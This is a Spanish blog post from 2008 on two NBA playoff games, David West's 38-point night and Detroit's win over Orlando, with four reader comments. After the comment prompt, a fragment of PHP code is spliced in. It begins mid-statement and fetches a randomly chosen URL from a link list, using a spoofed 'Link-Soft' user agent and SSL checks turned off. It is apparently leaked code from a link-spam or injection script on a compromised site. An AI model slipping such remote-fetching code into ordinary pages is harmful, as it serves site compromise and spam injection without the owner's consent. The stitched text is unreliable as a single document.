Increíble “West”

14 de May de 2008 por TheDeerHunter

Increíble “WEST” (SAS 79 – NOH 101)

Los Hornets recuperaron anoche, al amparo de su público, las buenas sensaciones del inicio de la serie y de paso, la iniciativa en la eliminatoria. De forma parecida a aquellos dos primeros partidos, la victoria se fraguó a partir del tercer cuarto, momento en el Chris Paul comenzó a carburar tras un gris comienzo, inflingiendo un terrorífico correctivo de 28 a 11 al que los actuales campeones no pudieron responder.

Se hablaba sobre los problemas físicos de la pareja interior de Hornets. Chandler se vió obligado a retirarse del partido anticipadamente pero West ,con molestias o sin ellas, salió como un poseso e hizo el partido de su vida. Ni más ni menos que 38 puntos, 14 rebotes, 5 tapones y 5 asistencias llevando por la calle de la amargura a todos sus defensores. Una auténtica pesadilla para Kurt Thomas, Oberto y en especial Rober Horry, que batía anoche el record de partidos disputados en play-offs que ostentaba el mismísimo Kareem Abdul-Jabbar. West tuvo una cruel manera de celebrarlo machacando una y otra vez sus huesos y los de sus compañeros. Independientemente de esos problemas físicos no se duda de la presencia ni de West ni de Chandler para el próximo partido.

Por su parte, Tim Duncan estuvo prácticamente seco en ataque. Byron Scott parece tener la fórmula para hacerle daño y el de las Islas Vírgenes bastante tuvo con mantener la cara reboteadora, con lo difícil que estaba anoche.

Se dice que quien gana el primer y el quinto partido de una serie tiene pie y medio en la segunda. Sin embargo, cuando San Antonio y el Álamo están de por medio, ninguna estadística en su contra puede ser definitiva. Ahora vuelven allí, donde nadie ha sido capaz de sacar nada en playoffs este año y de esta manera todo parece indicar que veremos el 7º partido. Entonces veremos realmente de qué pasta están echos estos dos gigantes.

Sin despeinarse (ORL 86 – DET 91)

No ha hecho falta forzar a Billups, ni siquiera hacer un buen partido para eliminar a Orlando con cierta facilidad ya que las pérdidas de balón y los tiros libres terminaron de sentenciar a los de Florida. Como casi todo el mundo esperaba, a pesar de su buena trayectoria esta temporada, no han logrado subir al escalón de los verdaderos gallos del Este. Detroit llega a la final de conferencia por 6ª vez consecutiva superando a los míticos Bad Boys en varias categorías.

Orlando ha dado la cara hasta el final. Anoche, con Howard y Lewis bien controlados por los Pistons, Turkoglu volvió a ejercer de hombre orquesta, como lo hace en su selección. De base, de alero, de pívot… de lo que hiciera falta hizo un grandísimo partido en la línea de toda su temporada. Pero al final un tapón espectacular de Tayshaun Prince lo manda directamente a la lona y después de vacaciones. Merecidas las tiene, sin duda. El equipo cumplió más o menos bien, pero no fue suficiente porque delante ha habido un rival con demasiado empaque. Sin alardes, todos hicieron bien su trabajo. Del partido de anoche es de ley destacar, sobre los habituales, el gran trabajo otra vez de McDyess sobre Howard y el paso adelante que ha dado Rodney Stuckey para suplir a Billups en los momentos más feos de la eliminatoria.

Un gran finalista aguarda a Boston o Cleveland. Parece que van a poder descansar bastante mientras esperan sentados.

Comenta

4 comentarios a esta entrada

  1. tito dice:
    #1

    Bufff, cómo me están haciendo sufrir SA en estos Poffs… Uy, que es año par! Entonces lo miro desde otra perspectiva y lo que me están dando son muchas alegrías por seguir en la pomada.

      Citar

  2. MagicJohnson32 dice:
    #2

    Vaya vaya, resulta que el que se presenta en las finales del Este como rival a batir es Detroit.

    Sobre el Spurs-Hornets… ¿Duncan no ha marcado a West? Si la respuesta es no ¿a qué espera?

      Citar

  3. TheDeerHunter dice:
    #3

    West, por su movilidad es muy mal pájaro para todos los defensores de Spurs, incluído Duncan y Chandler también representa una dificultad muy grande para los que no son Duncan.

    Él, como siempre, sólo defiende a la primera espada interior en los momentos decisivos, después de que sus gregarios le protejan de faltas hasta ese momento.
    El problema es que sus gregarios no han podido en NO con West apenas en ningún momento y, por las características de estos partidos que se han resuelto en el tercer cuarto, cuando Duncan ha decidido cambiar la marca ha sido en momentos puntuales en los que Hornets ya se estaban marchando en el marcador. Pocas defensas, que tampoco han sido eficaces.

    No sé si Popovic se planteará dejar a Duncan en exclusividad contra West, particularmente creo que en ese caso se tendrán que olvidar bastante de él en ataque y que en el otro poste Chandler puede hacer chichinas a Oberto, Thomas y demás.

      Citar

  4. xapa_croack dice:
    #4

    Si te emparejas con West, Chandler se keda libre, pq kurt thomas esta muy flojo, tanto en ataque como en defensa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>